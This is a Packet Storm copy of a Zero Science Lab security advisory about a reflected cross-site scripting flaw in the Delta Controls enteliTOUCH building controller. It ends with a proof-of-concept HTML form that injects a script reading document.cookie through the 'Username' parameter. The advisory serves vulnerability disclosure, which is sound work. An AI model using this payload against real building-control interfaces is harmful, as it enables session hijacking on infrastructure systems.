Lucene search

K
packetstormLiquidWorm, zeroscience.mkPACKETSTORM:166728
HistoryApr 14, 2022 - 12:00 a.m.

Delta Controls enteliTOUCH 3.40.3935 Cross Site Scripting

2022-04-1400:00:00
LiquidWorm, zeroscience.mk
packetstormsecurity.com
221
`<!DOCTYPE html>  
<html>  
<head><title>enteliTouch XSS</title></head>  
<body>  
<!--  
  
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)  
  
  
Vendor: Delta Controls Inc.  
Product web page: https://www.deltacontrols.com  
Affected version: 3.40.3935  
3.40.3706  
3.33.4005  
  
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant  
access to the heart of your BAS. The enteliTOUCH has a 7-inch,  
high-resolution display that serves as an interface to your building.  
Use it as your primary interface for smaller facilities or as an  
on-the-spot access point for larger systems. The intuitive,  
easy-to-navigate interface gives instant access to manage your BAS.  
  
Desc: Input passed to the POST parameter 'Username' is not properly  
sanitised before being returned to the user. This can be exploited  
to execute arbitrary HTML code in a user's browser session in context  
of an affected site.  
  
Tested on: DELTA enteliTOUCH  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5703  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php  
  
  
06.04.2022  
  
-->  
  
  
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">  
<input type="hidden" name="userInfo" value="" />  
<input type="hidden" name="UL_SelectedOptionId" value="" />  
<input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" />  
<input type="hidden" name="formAction" value="Delete" />  
<input type="submit" value="CSRF XSS Alert!" />  
</form>  
  
</body>  
</html>  
`